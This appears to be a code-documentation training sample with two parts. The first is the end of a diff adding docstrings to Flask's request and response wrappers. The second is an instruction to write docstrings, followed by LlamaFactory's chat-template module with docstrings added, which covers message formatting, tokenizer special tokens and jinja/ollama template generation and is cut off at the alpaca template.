+ It is what ends up as :class:`~flask.request`. If you want to replace
+ the request object used you can subclass this and set
+ :attr:`~flask.Flask.request_class` to your subclass.
+
+ The request object is a :class:`~werkzeug.wrappers.Request` subclass and
+ provides all of the attributes Werkzeug defines plus a few Flask
+ specific ones.
+ """
json_module: t.Any = json
@@ -47,6 +58,25 @@
@property
def max_content_length(self) -> int | None:
+ """The maximum number of bytes that will be read during this request. If
+ this limit is exceeded, a 413 :exc:`~werkzeug.exceptions.RequestEntityTooLarge`
+ error is raised. If it is set to ``None``, no limit is enforced at the
+ Flask application level. However, if it is ``None`` and the request has
+ no ``Content-Length`` header and the WSGI server does not indicate that
+ it terminates the stream, then no data is read to avoid an infinite
+ stream.
+
+ Each request defaults to the :data:`MAX_CONTENT_LENGTH` config, which
+ defaults to ``None``. It can be set on a specific ``request`` to apply
+ the limit to that specific view. This should be set appropriately based
+ on an application's or view's specific needs.
+
+ .. versionchanged:: 3.1
+ This can be set per-request.
+
+ .. versionchanged:: 0.6
+ This is configurable through Flask config.
+ """
if self._max_content_length is not None:
return self._max_content_length
@@ -61,6 +91,19 @@
@property
def max_form_memory_size(self) -> int | None:
+ """The maximum size in bytes any non-file form field may be in a
+ ``multipart/form-data`` body. If this limit is exceeded, a 413
+ :exc:`~werkzeug.exceptions.RequestEntityTooLarge` error is raised. If it
+ is set to ``None``, no limit is enforced at the Flask application level.
+
+ Each request defaults to the :data:`MAX_FORM_MEMORY_SIZE` config, which
+ defaults to ``500_000``. It can be set on a specific ``request`` to
+ apply the limit to that specific view. This should be set appropriately
+ based on an application's or view's specific needs.
+
+ .. versionchanged:: 3.1
+ This is configurable through Flask config.
+ """
if self._max_form_memory_size is not None:
return self._max_form_memory_size
@@ -75,6 +118,19 @@
@property # type: ignore[override]
def max_form_parts(self) -> int | None:
+ """The maximum number of fields that may be present in a
+ ``multipart/form-data`` body. If this limit is exceeded, a 413
+ :exc:`~werkzeug.exceptions.RequestEntityTooLarge` error is raised. If it
+ is set to ``None``, no limit is enforced at the Flask application level.
+
+ Each request defaults to the :data:`MAX_FORM_PARTS` config, which
+ defaults to ``1_000``. It can be set on a specific ``request`` to apply
+ the limit to that specific view. This should be set appropriately based
+ on an application's or view's specific needs.
+
+ .. versionchanged:: 3.1
+ This is configurable through Flask config.
+ """
if self._max_form_parts is not None:
return self._max_form_parts
@@ -89,6 +145,14 @@
@property
def endpoint(self) -> str | None:
+ """The endpoint that matched the request URL.
+
+ This will be ``None`` if matching failed or has not been
+ performed yet.
+
+ This in combination with :attr:`view_args` can be used to
+ reconstruct the same URL or a modified URL.
+ """
if self.url_rule is not None:
return self.url_rule.endpoint # type: ignore[no-any-return]
@@ -96,6 +160,16 @@
@property
def blueprint(self) -> str | None:
+ """The registered name of the current blueprint.
+
+ This will be ``None`` if the endpoint is not part of a
+ blueprint, or if URL matching failed or has not been performed
+ yet.
+
+ This does not necessarily match the name the blueprint was
+ created with. It may have been nested, or registered with a
+ different name.
+ """
endpoint = self.endpoint
if endpoint is not None and "." in endpoint:
@@ -105,6 +179,14 @@
@property
def blueprints(self) -> list[str]:
+ """The registered names of the current blueprint upwards through
+ parent blueprints.
+
+ This will be an empty list if there is no current blueprint, or
+ if URL matching failed.
+
+ .. versionadded:: 2.0.1
+ """
name = self.blueprint
if name is None:
@@ -138,6 +220,22 @@
class Response(ResponseBase):
+ """The response object that is used by default in Flask. Works like the
+ response object from Werkzeug but is set to have an HTML mimetype by
+ default. Quite often you don't have to create this object yourself because
+ :meth:`~flask.Flask.make_response` will take care of that for you.
+
+ If you want to replace the response object used you can subclass this and
+ set :attr:`~flask.Flask.response_class` to your subclass.
+
+ .. versionchanged:: 1.0
+ JSON support is added to the response, like the request. This is useful
+ when testing to get the test client response data as JSON.
+
+ .. versionchanged:: 1.0
+
+ Added :attr:`max_cookie_size`.
+ """
default_mimetype: str | None = "text/html"
@@ -147,8 +245,13 @@
@property
def max_cookie_size(self) -> int: # type: ignore
+ """Read-only view of the :data:`MAX_COOKIE_SIZE` config key.
+
+ See :attr:`~werkzeug.wrappers.Response.max_cookie_size` in
+ Werkzeug's docs.
+ """
if current_app:
return current_app.config["MAX_COOKIE_SIZE"] # type: ignore[no-any-return]
# return Werkzeug's default when not in an app context
- return super().max_cookie_size+ return super().max_cookie_size
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/wrappers.py |
Write docstrings describing functionality | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from copy import deepcopy
from dataclasses import dataclass
from typing import TYPE_CHECKING, Optional, Union
from typing_extensions import override
from ..extras import logging
from .data_utils import Role
from .formatter import EmptyFormatter, FunctionFormatter, StringFormatter, ToolFormatter
from .mm_plugin import get_mm_plugin
if TYPE_CHECKING:
from transformers import PreTrainedTokenizer
from ..hparams import DataArguments
from .formatter import SLOTS, Formatter
from .mm_plugin import BasePlugin
from .tool_utils import FunctionCall
# Module-level logger; provides the rank-aware `info_rank0`/`warning_rank0` helpers used below.
logger = logging.get_logger(__name__)
@dataclass
class Template:
    r"""Describes how chat messages are rendered and tokenized for one model family.

    Each ``format_*`` attribute is a ``Formatter`` that turns one message (or the
    system/tool/prefix text) into a list of slots, which are then converted into
    token ids by :meth:`_convert_elements_to_ids`.
    """

    format_user: "Formatter"  # renders user messages
    format_assistant: "Formatter"  # renders assistant messages
    format_system: "Formatter"  # renders the system message (tool text appended)
    format_function: "Formatter"  # renders assistant tool/function calls
    format_observation: "Formatter"  # renders tool results sent back to the model
    format_tools: "Formatter"  # renders the tool schema and extracts tool calls
    format_prefix: "Formatter"  # emitted once before the first message
    default_system: str  # system message used when none is provided
    stop_words: list[str]  # extra stop tokens besides the EOS token
    thought_words: tuple[str, str]  # opening/closing markers of a reasoning (CoT) block
    tool_call_words: tuple[str, str]  # opening/closing markers of a tool call
    efficient_eos: bool  # if True, the template handles EOS placement itself
    replace_eos: bool  # if True, the first stop word replaces the tokenizer's EOS
    replace_jinja_template: bool  # if True, overwrite the tokenizer's chat template
    enable_thinking: Optional[bool]  # controls how reasoning content is treated (see ReasoningTemplate)
    mm_plugin: "BasePlugin"  # multimodal plugin for image/video/audio inputs

    def encode_oneturn(
        self,
        tokenizer: "PreTrainedTokenizer",
        messages: list[dict[str, str]],
        system: Optional[str] = None,
        tools: Optional[str] = None,
    ) -> tuple[list[int], list[int]]:
        r"""Return a single ``(prompt_ids, response_ids)`` pair.

        All encoded messages except the last are concatenated into the prompt;
        the last message becomes the response.
        """
        encoded_messages = self._encode(tokenizer, messages, system, tools)
        prompt_ids = []
        for encoded_ids in encoded_messages[:-1]:
            prompt_ids += encoded_ids

        response_ids = encoded_messages[-1]
        return prompt_ids, response_ids

    def encode_multiturn(
        self,
        tokenizer: "PreTrainedTokenizer",
        messages: list[dict[str, str]],
        system: Optional[str] = None,
        tools: Optional[str] = None,
    ) -> list[tuple[list[int], list[int]]]:
        r"""Return one ``(prompt_ids, response_ids)`` pair per conversation turn.

        Messages are paired positionally: even indices are prompts, odd indices
        are responses.
        """
        encoded_messages = self._encode(tokenizer, messages, system, tools)
        return [(encoded_messages[i], encoded_messages[i + 1]) for i in range(0, len(encoded_messages), 2)]

    def extract_tool(self, content: str) -> Union[str, list["FunctionCall"]]:
        r"""Extract tool calls (if any) from a generated message via ``format_tools``."""
        return self.format_tools.extract(content)

    def get_stop_token_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
        r"""Return the deduplicated ids of the EOS token plus all stop words."""
        stop_token_ids = {tokenizer.eos_token_id}
        for token in self.stop_words:
            stop_token_ids.add(tokenizer.convert_tokens_to_ids(token))

        return list(stop_token_ids)

    def add_thought(self, content: str = "") -> str:
        r"""Prepend an empty thought block (both thought markers) to ``content``."""
        return f"{self.thought_words[0]}{self.thought_words[1]}" + content

    def remove_thought(self, content: str) -> str:
        r"""Remove every thought block from ``content`` and strip leading newlines."""
        pattern = re.compile(f"{re.escape(self.thought_words[0])}(.*?){re.escape(self.thought_words[1])}", re.DOTALL)
        return re.sub(pattern, "", content).lstrip("\n")

    def get_thought_word_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
        r"""Return the token ids of an empty thought block (no special tokens added)."""
        return tokenizer.encode(self.add_thought(), add_special_tokens=False)

    def _convert_elements_to_ids(self, tokenizer: "PreTrainedTokenizer", elements: "SLOTS") -> list[int]:
        r"""Convert formatter slots into token ids.

        Strings are tokenized; a dict denotes a single named special token; the
        sets ``{"bos_token"}`` / ``{"eos_token"}`` insert the corresponding id
        when the tokenizer defines it.

        Raises:
            ValueError: On any other slot type.
        """
        token_ids = []
        for elem in elements:
            if isinstance(elem, str):
                if len(elem) != 0:
                    token_ids += tokenizer.encode(elem, add_special_tokens=False)
            elif isinstance(elem, dict):
                token_ids += [tokenizer.convert_tokens_to_ids(elem.get("token"))]
            elif isinstance(elem, set):
                if "bos_token" in elem and tokenizer.bos_token_id is not None:
                    token_ids += [tokenizer.bos_token_id]
                elif "eos_token" in elem and tokenizer.eos_token_id is not None:
                    token_ids += [tokenizer.eos_token_id]
            else:
                raise ValueError(f"Input must be string, set[str] or dict[str, str], got {type(elem)}")

        return token_ids

    def _encode(
        self,
        tokenizer: "PreTrainedTokenizer",
        messages: list[dict[str, str]],
        system: Optional[str],
        tools: Optional[str],
    ) -> list[list[int]]:
        r"""Encode the conversation into one token-id list per message.

        Turn 0: prefix + system (+ tool text) + user    assistant
        Turn t: user                                    assistant
        """
        system = system or self.default_system
        encoded_messages = []
        for i, message in enumerate(messages):
            elements = []

            if i == 0:
                elements += self.format_prefix.apply()
                if system or tools:
                    tool_text = self.format_tools.apply(content=tools)[0] if tools else ""
                    elements += self.format_system.apply(content=(system + tool_text))

            if message["role"] == Role.USER:
                elements += self.format_user.apply(content=message["content"], idx=str(i // 2))
            elif message["role"] == Role.ASSISTANT:
                elements += self.format_assistant.apply(content=message["content"])
            elif message["role"] == Role.OBSERVATION:
                elements += self.format_observation.apply(content=message["content"])
            elif message["role"] == Role.FUNCTION:
                elements += self.format_function.apply(
                    content=message["content"], thought_words=self.thought_words, tool_call_words=self.tool_call_words
                )
            else:
                raise NotImplementedError("Unexpected role: {}".format(message["role"]))

            encoded_messages.append(self._convert_elements_to_ids(tokenizer, elements))

        return encoded_messages

    @staticmethod
    def _add_or_replace_eos_token(tokenizer: "PreTrainedTokenizer", eos_token: str) -> None:
        r"""Set ``eos_token`` as the tokenizer's EOS, adding it to the vocab if needed."""
        if tokenizer.eos_token == eos_token:
            return

        is_added = tokenizer.eos_token_id is None
        num_added_tokens = tokenizer.add_special_tokens({"eos_token": eos_token})
        if is_added:
            logger.info_rank0(f"Add eos token: {tokenizer.eos_token}.")
        else:
            logger.info_rank0(f"Replace eos token: {tokenizer.eos_token}.")

        if num_added_tokens > 0:
            logger.warning_rank0("New tokens have been added, make sure `resize_vocab` is True.")

    def fix_special_tokens(self, tokenizer: "PreTrainedTokenizer") -> None:
        r"""Ensure the tokenizer has EOS/PAD tokens and knows this template's stop words.

        When ``replace_eos`` is set, the first stop word becomes the EOS token;
        remaining stop words are registered as additional special tokens.

        Raises:
            ValueError: If ``replace_eos`` is set but no stop words are defined.
        """
        stop_words = self.stop_words
        if self.replace_eos:
            if not stop_words:
                raise ValueError("Stop words are required to replace the EOS token.")

            self._add_or_replace_eos_token(tokenizer, eos_token=stop_words[0])
            stop_words = stop_words[1:]

        if tokenizer.eos_token_id is None:
            self._add_or_replace_eos_token(tokenizer, eos_token="<|endoftext|>")

        if tokenizer.pad_token_id is None:
            tokenizer.pad_token = tokenizer.eos_token
            logger.info_rank0(f"Add pad token: {tokenizer.pad_token}")

        if stop_words:
            try:
                num_added_tokens = tokenizer.add_special_tokens(
                    dict(additional_special_tokens=stop_words), replace_additional_special_tokens=False
                )
            except TypeError:  # fall back when the tokenizer does not accept `replace_additional_special_tokens`
                num_added_tokens = tokenizer.add_special_tokens(dict(additional_special_tokens=stop_words))

            logger.info_rank0("Add {} to stop words.".format(",".join(stop_words)))
            if num_added_tokens > 0:
                logger.warning_rank0("New tokens have been added, make sure `resize_vocab` is True.")

    @staticmethod
    def _jinja_escape(content: str) -> str:
        r"""Escape single quotes so ``content`` can live inside a jinja string literal."""
        return content.replace("'", r"\'")

    @staticmethod
    def _convert_slots_to_jinja(slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content") -> str:
        r"""Render formatter slots as a jinja expression, substituting ``placeholder`` for ``{{content}}``.

        Raises:
            ValueError: If a dict (special-token) slot is present, which jinja
                templates cannot express here.
        """
        slot_items = []
        for slot in slots:
            if isinstance(slot, str):
                slot_pieces = slot.split("{{content}}")
                if slot_pieces[0]:
                    slot_items.append("'" + Template._jinja_escape(slot_pieces[0]) + "'")
                if len(slot_pieces) > 1:
                    slot_items.append(placeholder)
                    if slot_pieces[1]:
                        slot_items.append("'" + Template._jinja_escape(slot_pieces[1]) + "'")
            elif isinstance(slot, set):  # do not use {{ eos_token }} since it may be replaced
                if "bos_token" in slot and tokenizer.bos_token_id is not None:
                    slot_items.append("'" + tokenizer.bos_token + "'")
                elif "eos_token" in slot and tokenizer.eos_token_id is not None:
                    slot_items.append("'" + tokenizer.eos_token + "'")
            elif isinstance(slot, dict):
                raise ValueError("Dict is not supported.")

        return " + ".join(slot_items)

    def _get_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> str:
        r"""Build a jinja chat template equivalent to this template.

        Only the prefix, system, user and assistant formats are expressed;
        observation/function roles are not covered.
        """
        prefix = self._convert_slots_to_jinja(self.format_prefix.apply(), tokenizer)
        system = self._convert_slots_to_jinja(self.format_system.apply(), tokenizer, placeholder="system_message")
        user = self._convert_slots_to_jinja(self.format_user.apply(), tokenizer)
        assistant = self._convert_slots_to_jinja(self.format_assistant.apply(), tokenizer)
        jinja_template = ""
        if prefix:
            jinja_template += "{{ " + prefix + " }}"

        if self.default_system:
            jinja_template += "{% set system_message = '" + self._jinja_escape(self.default_system) + "' %}"

        jinja_template += (
            "{% if messages[0]['role'] == 'system' %}{% set loop_messages = messages[1:] %}"
            "{% set system_message = messages[0]['content'] %}{% else %}{% set loop_messages = messages %}{% endif %}"
            "{% if system_message is defined %}{{ " + system + " }}{% endif %}"
            "{% for message in loop_messages %}"
            "{% set content = message['content'] %}"
            "{% if message['role'] == 'user' %}"
            "{{ " + user + " }}"
            "{% elif message['role'] == 'assistant' %}"
            "{{ " + assistant + " }}"
            "{% endif %}"
            "{% endfor %}"
        )
        return jinja_template

    def fix_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> None:
        r"""Install the generated jinja template when the tokenizer has none or replacement is requested.

        Failures to build the template are logged, not raised.
        """
        if tokenizer.chat_template is None or self.replace_jinja_template:
            try:
                tokenizer.chat_template = self._get_jinja_template(tokenizer)
            except ValueError as e:
                logger.info_rank0(f"Cannot add this chat template to tokenizer: {e}.")

    @staticmethod
    def _convert_slots_to_ollama(
        slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content"
    ) -> str:
        r"""Render formatter slots as an ollama (Go) template string.

        Raises:
            ValueError: If a dict (special-token) slot is present.
        """
        slot_items = []
        for slot in slots:
            if isinstance(slot, str):
                slot_pieces = slot.split("{{content}}")
                if slot_pieces[0]:
                    slot_items.append(slot_pieces[0])
                if len(slot_pieces) > 1:
                    slot_items.append("{{ " + placeholder + " }}")
                    if slot_pieces[1]:
                        slot_items.append(slot_pieces[1])
            elif isinstance(slot, set):  # do not use {{ eos_token }} since it may be replaced
                if "bos_token" in slot and tokenizer.bos_token_id is not None:
                    slot_items.append(tokenizer.bos_token)
                elif "eos_token" in slot and tokenizer.eos_token_id is not None:
                    slot_items.append(tokenizer.eos_token)
            elif isinstance(slot, dict):
                raise ValueError("Dict is not supported.")

        return "".join(slot_items)

    def _get_ollama_template(self, tokenizer: "PreTrainedTokenizer") -> str:
        r"""Build the ollama ``TEMPLATE`` string (prefix, system, user/assistant loop)."""
        prefix = self._convert_slots_to_ollama(self.format_prefix.apply(), tokenizer)
        system = self._convert_slots_to_ollama(self.format_system.apply(), tokenizer, placeholder=".System")
        user = self._convert_slots_to_ollama(self.format_user.apply(), tokenizer, placeholder=".Content")
        assistant = self._convert_slots_to_ollama(self.format_assistant.apply(), tokenizer, placeholder=".Content")
        return (
            f"{prefix}{{{{ if .System }}}}{system}{{{{ end }}}}"
            f"""{{{{ range .Messages }}}}{{{{ if eq .Role "user" }}}}{user}"""
            f"""{{{{ else if eq .Role "assistant" }}}}{assistant}{{{{ end }}}}{{{{ end }}}}"""
        )

    def get_ollama_modelfile(self, tokenizer: "PreTrainedTokenizer") -> str:
        r"""Return a complete ollama modelfile: template, default system, stop parameters."""
        modelfile = "# ollama modelfile auto-generated by llamafactory\n\n"
        modelfile += f'FROM .\n\nTEMPLATE """{self._get_ollama_template(tokenizer)}"""\n\n'

        if self.default_system:
            modelfile += f'SYSTEM """{self.default_system}"""\n\n'

        for stop_token_id in self.get_stop_token_ids(tokenizer):
            modelfile += f'PARAMETER stop "{tokenizer.convert_ids_to_tokens(stop_token_id)}"\n'

        modelfile += "PARAMETER num_ctx 4096\n"
        return modelfile
@dataclass
class Llama2Template(Template):
    r"""Template variant for Llama-2-style models.

    The rendered system text is merged into the first user message instead of
    being emitted as a standalone message.
    """

    @override
    def _encode(
        self,
        tokenizer: "PreTrainedTokenizer",
        messages: list[dict[str, str]],
        system: str,
        tools: str,
    ) -> list[list[int]]:
        r"""Encode messages, prepending the rendered system text to the first user message."""
        system = system or self.default_system
        encoded_messages = []
        for i, message in enumerate(messages):
            elements = []

            system_text = ""
            if i == 0:
                elements += self.format_prefix.apply()
                if system or tools:
                    tool_text = self.format_tools.apply(content=tools)[0] if tools else ""
                    system_text = self.format_system.apply(content=(system + tool_text))[0]

            if message["role"] == Role.USER:
                elements += self.format_user.apply(content=system_text + message["content"])
            elif message["role"] == Role.ASSISTANT:
                elements += self.format_assistant.apply(content=message["content"])
            elif message["role"] == Role.OBSERVATION:
                elements += self.format_observation.apply(content=message["content"])
            elif message["role"] == Role.FUNCTION:
                elements += self.format_function.apply(content=message["content"])
            else:
                raise NotImplementedError("Unexpected role: {}".format(message["role"]))

            encoded_messages.append(self._convert_elements_to_ids(tokenizer, elements))

        return encoded_messages

    def _get_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> str:
        r"""Build a jinja template where the system message is prefixed to the first turn's content."""
        prefix = self._convert_slots_to_jinja(self.format_prefix.apply(), tokenizer)
        system_message = self._convert_slots_to_jinja(
            self.format_system.apply(), tokenizer, placeholder="system_message"
        )
        user_message = self._convert_slots_to_jinja(self.format_user.apply(), tokenizer)
        assistant_message = self._convert_slots_to_jinja(self.format_assistant.apply(), tokenizer)
        jinja_template = ""
        if prefix:
            jinja_template += "{{ " + prefix + " }}"

        if self.default_system:
            jinja_template += "{% set system_message = '" + self._jinja_escape(self.default_system) + "' %}"

        jinja_template += (
            "{% if messages[0]['role'] == 'system' %}{% set loop_messages = messages[1:] %}"
            "{% set system_message = messages[0]['content'] %}{% else %}{% set loop_messages = messages %}{% endif %}"
            "{% for message in loop_messages %}"
            "{% if loop.index0 == 0 and system_message is defined %}"
            "{% set content = " + system_message + " + message['content'] %}"
            "{% else %}{% set content = message['content'] %}{% endif %}"
            "{% if message['role'] == 'user' %}"
            "{{ " + user_message + " }}"
            "{% elif message['role'] == 'assistant' %}"
            "{{ " + assistant_message + " }}"
            "{% endif %}"
            "{% endfor %}"
        )
        return jinja_template
@dataclass
class ReasoningTemplate(Template):
    r"""Template for reasoning models that emit thought (chain-of-thought) blocks.

    Thought blocks are stripped from historical assistant turns; when
    ``enable_thinking`` is ``False`` they are stripped everywhere. If the
    trained assistant message lacks thought markers, an empty thought block is
    inserted — into the prompt (no loss) when thinking is disabled, or into
    the response (trained) otherwise.
    """

    @override
    def encode_oneturn(
        self,
        tokenizer: "PreTrainedTokenizer",
        messages: list[dict[str, str]],
        system: Optional[str] = None,
        tools: Optional[str] = None,
    ) -> tuple[list[int], list[int]]:
        r"""Return ``(prompt_ids, response_ids)`` with thought handling applied to the last message."""
        messages = deepcopy(messages)
        # Strip thoughts from historical assistant turns (all but the last).
        for i in range(1, len(messages) - 2, 2):
            messages[i]["content"] = self.remove_thought(messages[i]["content"])

        if self.enable_thinking is False:  # remove all cot
            messages[-1]["content"] = self.remove_thought(messages[-1]["content"])

        prompt_ids, response_ids = super().encode_oneturn(tokenizer, messages, system, tools)
        if (
            self.thought_words[0].strip() not in messages[-1]["content"]
            and self.thought_words[1].strip() not in messages[-1]["content"]
        ):  # add empty cot
            if not self.enable_thinking:  # do not compute loss
                prompt_ids += self.get_thought_word_ids(tokenizer)
            else:  # do compute loss
                response_ids = self.get_thought_word_ids(tokenizer) + response_ids

        return prompt_ids, response_ids

    @override
    def encode_multiturn(
        self,
        tokenizer: "PreTrainedTokenizer",
        messages: list[dict[str, str]],
        system: Optional[str] = None,
        tools: Optional[str] = None,
    ) -> list[tuple[list[int], list[int]]]:
        r"""Return per-turn ``(prompt_ids, response_ids)`` pairs with thought handling on every turn."""
        messages = deepcopy(messages)
        if self.enable_thinking is False:  # remove all cot
            for i in range(1, len(messages), 2):
                messages[i]["content"] = self.remove_thought(messages[i]["content"])

        encoded_messages = self._encode(tokenizer, messages, system, tools)
        for i in range(0, len(messages), 2):
            if (
                self.thought_words[0].strip() not in messages[i + 1]["content"]
                and self.thought_words[1].strip() not in messages[i + 1]["content"]
            ):  # add empty cot
                if not self.enable_thinking:  # do not compute loss
                    encoded_messages[i] += self.get_thought_word_ids(tokenizer)
                else:  # do compute loss
                    encoded_messages[i + 1] = self.get_thought_word_ids(tokenizer) + encoded_messages[i + 1]

        return [(encoded_messages[i], encoded_messages[i + 1]) for i in range(0, len(encoded_messages), 2)]
@dataclass
class Glm47ReasoningTemplate(ReasoningTemplate):
    r"""Reasoning template for GLM-4.x models.

    Differs from the base class in that an empty thought is represented by the
    closing marker alone, while non-empty thoughts are wrapped in both markers.
    """

    @override
    def add_thought(self, content: str = "") -> str:
        r"""Wrap ``content`` in thought markers; emit only the closing marker when empty."""
        opening, closing = self.thought_words
        return f"{opening}{content}{closing}" if content else closing
# Global registry of chat templates, keyed by name and populated by `register_template()`.
TEMPLATES: dict[str, "Template"] = {}
def register_template(
    name: str,
    format_user: Optional["Formatter"] = None,
    format_assistant: Optional["Formatter"] = None,
    format_system: Optional["Formatter"] = None,
    format_function: Optional["Formatter"] = None,
    format_observation: Optional["Formatter"] = None,
    format_tools: Optional["Formatter"] = None,
    format_prefix: Optional["Formatter"] = None,
    default_system: str = "",
    stop_words: Optional[list[str]] = None,
    thought_words: Optional[tuple[str, str]] = None,
    tool_call_words: Optional[tuple[str, str]] = None,
    efficient_eos: bool = False,
    replace_eos: bool = False,
    replace_jinja_template: bool = False,
    enable_thinking: Optional[bool] = True,
    mm_plugin: "BasePlugin" = get_mm_plugin(name="base"),
    template_class: type["Template"] = Template,
) -> None:
    r"""Register a chat template under ``name`` in the global ``TEMPLATES`` registry.

    Formatters left as ``None`` fall back to defaults: a plain ``{{content}}``
    string formatter for user/system/observation, an assistant formatter that
    appends the EOS token unless ``efficient_eos`` is set, and default-format
    function/tool formatters (the function formatter reuses the assistant
    slots when a custom ``format_assistant`` is given).

    Raises:
        ValueError: If a template with the same ``name`` is already registered.
    """
    if name in TEMPLATES:
        raise ValueError(f"Template {name} already exists.")

    default_slots = ["{{content}}"] if efficient_eos else ["{{content}}", {"eos_token"}]
    default_user_formatter = StringFormatter(slots=["{{content}}"])
    default_assistant_formatter = StringFormatter(slots=default_slots)
    if format_assistant is not None:
        default_function_formatter = FunctionFormatter(slots=format_assistant.slots, tool_format="default")
    else:
        default_function_formatter = FunctionFormatter(slots=default_slots, tool_format="default")

    default_tool_formatter = ToolFormatter(tool_format="default")
    default_prefix_formatter = EmptyFormatter()
    TEMPLATES[name] = template_class(
        format_user=format_user or default_user_formatter,
        format_assistant=format_assistant or default_assistant_formatter,
        format_system=format_system or default_user_formatter,
        format_function=format_function or default_function_formatter,
        format_observation=format_observation or format_user or default_user_formatter,
        format_tools=format_tools or default_tool_formatter,
        format_prefix=format_prefix or default_prefix_formatter,
        default_system=default_system,
        stop_words=stop_words or [],
        thought_words=thought_words or ("<think>\n", "\n</think>\n\n"),
        tool_call_words=tool_call_words or ("<tool_call>", "</tool_call>"),
        efficient_eos=efficient_eos,
        replace_eos=replace_eos,
        replace_jinja_template=replace_jinja_template,
        enable_thinking=enable_thinking,
        mm_plugin=mm_plugin,
    )
def parse_template(tokenizer: "PreTrainedTokenizer") -> "Template":
    r"""Reverse-engineer a ``Template`` from the tokenizer's own jinja chat template.

    Probe conversations containing the literal placeholder ``{{content}}`` are
    rendered with ``tokenizer.apply_chat_template`` and the rendered strings
    are sliced to recover the prefix, system, user and assistant slots. A
    default system prompt baked into the jinja template is recovered by
    diffing the render with an explicit empty system message against the
    render without one. ``ReasoningTemplate`` is chosen when the assistant
    slot contains ``<think>``.
    """

    def find_diff(short_str: str, long_str: str) -> str:
        # Collect the characters of long_str that are skipped while matching
        # short_str inside it (simple two-pointer diff).
        i, j = 0, 0
        diff = ""
        while i < len(short_str) and j < len(long_str):
            if short_str[i] == long_str[j]:
                i += 1
                j += 1
            else:
                diff += long_str[j]
                j += 1

        return diff

    # Text produced by special tokens alone (e.g. a BOS prefix).
    prefix = tokenizer.decode(tokenizer.encode(""))

    messages = [{"role": "system", "content": "{{content}}"}]
    system_slot = tokenizer.apply_chat_template(messages, add_generation_prompt=False, tokenize=False)[len(prefix) :]

    messages = [{"role": "system", "content": ""}, {"role": "user", "content": "{{content}}"}]
    user_slot_empty_system = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
    user_slot_empty_system = user_slot_empty_system[len(prefix) :]

    messages = [{"role": "user", "content": "{{content}}"}]
    user_slot = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
    user_slot = user_slot[len(prefix) :]

    messages = [{"role": "user", "content": "{{content}}"}, {"role": "assistant", "content": "{{content}}"}]
    assistant_slot = tokenizer.apply_chat_template(messages, add_generation_prompt=False, tokenize=False)
    assistant_slot = assistant_slot[len(prefix) + len(user_slot) :]
    template_class = ReasoningTemplate if "<think>" in assistant_slot else Template
    assistant_slot = assistant_slot.replace("<think>", "").replace("</think>", "").lstrip("\n")  # remove thought tags

    if len(user_slot) > len(user_slot_empty_system):
        default_system = find_diff(user_slot_empty_system, user_slot)
        sole_system = system_slot.replace("{{content}}", default_system, 1)
        user_slot = user_slot[len(sole_system) :]
    else:  # if default_system is empty, user_slot_empty_system will be longer than user_slot
        default_system = ""

    return template_class(
        format_user=StringFormatter(slots=[user_slot]),
        format_assistant=StringFormatter(slots=[assistant_slot]),
        format_system=StringFormatter(slots=[system_slot]),
        format_function=FunctionFormatter(slots=[assistant_slot], tool_format="default"),
        format_observation=StringFormatter(slots=[user_slot]),
        format_tools=ToolFormatter(tool_format="default"),
        format_prefix=EmptyFormatter(slots=[prefix]) if prefix else EmptyFormatter(),
        default_system=default_system,
        stop_words=[],
        thought_words=("<think>\n", "\n</think>\n\n"),
        tool_call_words=("<tool_call>", "</tool_call>"),
        efficient_eos=False,
        replace_eos=False,
        replace_jinja_template=False,
        enable_thinking=True,
        mm_plugin=get_mm_plugin(name="base"),
    )
def get_template_and_fix_tokenizer(tokenizer: "PreTrainedTokenizer", data_args: "DataArguments") -> "Template":
    r"""Resolve the chat template from ``data_args`` and patch the tokenizer accordingly.

    When ``data_args.template`` is unset, the template is parsed from the
    tokenizer's own chat template if available, otherwise the ``empty``
    template is used. Overrides from ``data_args`` (tool format, default
    system, ``enable_thinking``) are applied in place, then the tokenizer's
    special tokens and jinja template are fixed.

    Raises:
        ValueError: If the named template does not exist, or if
            ``train_on_prompt`` is combined with an ``efficient_eos`` template.
    """
    if data_args.template is None:
        if isinstance(tokenizer.chat_template, str):
            logger.warning_rank0("`template` was not specified, try parsing the chat template from the tokenizer.")
            template = parse_template(tokenizer)
        else:
            logger.warning_rank0("`template` was not specified, use `empty` template.")
            template = TEMPLATES["empty"]  # placeholder
    else:
        if data_args.template not in TEMPLATES:
            raise ValueError(f"Template {data_args.template} does not exist.")

        template = TEMPLATES[data_args.template]

    if data_args.train_on_prompt and template.efficient_eos:
        raise ValueError("Current template does not support `train_on_prompt`.")

    if data_args.tool_format is not None:
        logger.info_rank0(f"Using tool format: {data_args.tool_format}.")
        default_slots = ["{{content}}"] if template.efficient_eos else ["{{content}}", {"eos_token"}]
        template.format_function = FunctionFormatter(slots=default_slots, tool_format=data_args.tool_format)
        template.format_tools = ToolFormatter(tool_format=data_args.tool_format)

    if data_args.default_system is not None:
        logger.info_rank0(f"Using default system message: {data_args.default_system}.")
        template.default_system = data_args.default_system

    if isinstance(template, ReasoningTemplate):
        logger.warning_rank0(
            "You are using reasoning template, "
            "please add `_nothink` suffix if the model is not a reasoning model. "
            "e.g., qwen3_vl_nothink"
        )
        template.enable_thinking = data_args.enable_thinking

    template.fix_special_tokens(tokenizer)
    template.fix_jinja_template(tokenizer)
    return template
# Alpaca plain-text template.
# Edge case: the assistant slot appends both the eos_token and "\n\n", so consecutive
# turns are separated by a blank line after the eos.
register_template(
    name="alpaca",
    format_user=StringFormatter(slots=["### Instruction:\n{{content}}\n\n### Response:\n"]),
